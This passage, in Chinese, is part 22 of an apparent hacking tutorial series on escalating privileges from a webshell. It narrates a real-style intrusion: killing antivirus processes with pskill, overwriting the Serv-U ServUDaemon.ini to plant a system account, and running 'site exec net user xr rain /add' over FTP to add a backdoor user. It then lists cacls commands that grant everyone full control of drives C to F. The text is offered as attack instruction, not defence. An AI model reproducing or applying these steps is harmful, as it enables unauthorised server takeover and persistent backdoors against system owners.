超全的webshell权限提升方法(22)

一阵漫长的等待，终于显示成功了。兴冲冲用radmin连上去，发现连接失败。晕死，忘了有防火墙了。上传pslist和pskill上去，发现有backice，木马克星等。Kill掉他们虽然可以登陆，但服务器重启后还是不行，终不是长久之计呀。防火墙是不防21，80等端口的，于是，我们的思路又回到了serv-u上了。把他的 ServUDaemon.ini下载下来，覆盖本机的ServUDaemon.ini，在本机的serv-u上添加一个用户名为xr，密码为rain的系统帐号，加上所有权限。再用老办法，上传，用shell写入D:\\program files\\serv-u\\里，覆盖掉原来的ServUDaemon.ini。虽然又等了n长时间，但是成功了，于是用flashfxp连上，发生 530错误。郁闷，怎么又失败了。（根据经验这样应该就可以了，但为什么不行没有想通，请高手指点。） 
不管了，我们重启serv-u就ok 了，怎么重启呢，开始想用shutdown重启系统，但那样我们就失去了nc这个shell，还可能被发现。后来，眼睛一亮，我们不是有pskill吗？刚才用pslist发现有这个进程：ServUDaemon 。把它kill了。然后再运行D:\\program files\\serv-u\\ ServUAdmin.exe ，这里要注意不是ServUDaemon.exe 。 
好了，到这里，我们直接ftp上去吧，ls一下，哈哈，系统盘在我的掌握下。我们能不能运行系统命令呢？是可以的，这样就可以： 
ftp>quote site exec net user xr rain /add 
在webshell上运行net user，就可以看见添加成功了。 
整个入侵渗透到这就结束了，在一阵后清理打扫后。我们就开始讨论了。其实，突破防火墙有很多好的rootkit可以做到的，但是我们觉得系统自带的服务才是最安全的后门。 
CAcls命令在提权中的使用 

cacls.exe c: /e /t /g everyone:F #把c盘设置为everyone可以浏览 
cacls.exe d: /e /t /g everyone:F #把d盘设置为everyone可以浏览 
cacls.exe e: /e /t /g everyone:F #把e盘设置为everyone可以浏览 
cacls.exe f: /e /t /g everyone:F #把f盘设置为everyone可以浏览 
F:\safe\溢出工具\sqlhello2>cacls 
显示或者修改文件的访问控制表(ACL) 
CACLS filename [/T] [/E] [/C] [/G user:perm] [/R user [...]] 
[/P user:perm [...]] [/D user [...]] 
filename 显示 ACL。 
/T 更改当前目录及其所有子目录中 
指定文件的 ACL。 
/E 编辑 ACL 而不替换。 
/C 在出现拒绝访问错误时继续。 
/G user:perm 赋予指定用户访问权限。 
Perm 可以是: R 读取